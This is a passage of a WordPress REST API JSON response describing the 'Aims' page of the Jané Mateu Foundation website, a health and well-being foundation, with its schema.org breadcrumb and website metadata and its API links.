well-being.","breadcrumb":{"@id":"https:\/\/janemateufoundation.org\/en\/aims\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/janemateufoundation.org\/en\/aims\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/janemateufoundation.org\/en\/aims\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/janemateufoundation.org\/en\/home\/"},{"@type":"ListItem","position":2,"name":"Aims"}]},{"@type":"WebSite","@id":"https:\/\/janemateufoundation.org\/#website","url":"https:\/\/janemateufoundation.org\/","name":"Jan\u00e9 Mateu Foundation","description":"Comprometidos con la salud y el bienestar","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/janemateufoundation.org\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"}]}},"_links":{"self":[{"href":"https:\/\/janemateufoundation.org\/en\/wp-json\/wp\/v2\/pages\/874","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/janemateufoundation.org\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/janemateufoundation.org\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/janemateufoundation.org\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/janemateufoundation.org\/en\/wp-json\/wp\/v2\/comments?post=874"}],"version-history":[{"count":0,"href":"https:\/\/janemateufoundation.org\/en\/wp-json\/wp\/v2\/pages\/874\/revisions"}],"wp:attachment":[{"href":"https:\/\/janemateufoundation.org\/en\/wp-json\/wp\/v2\/media?parent=874"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}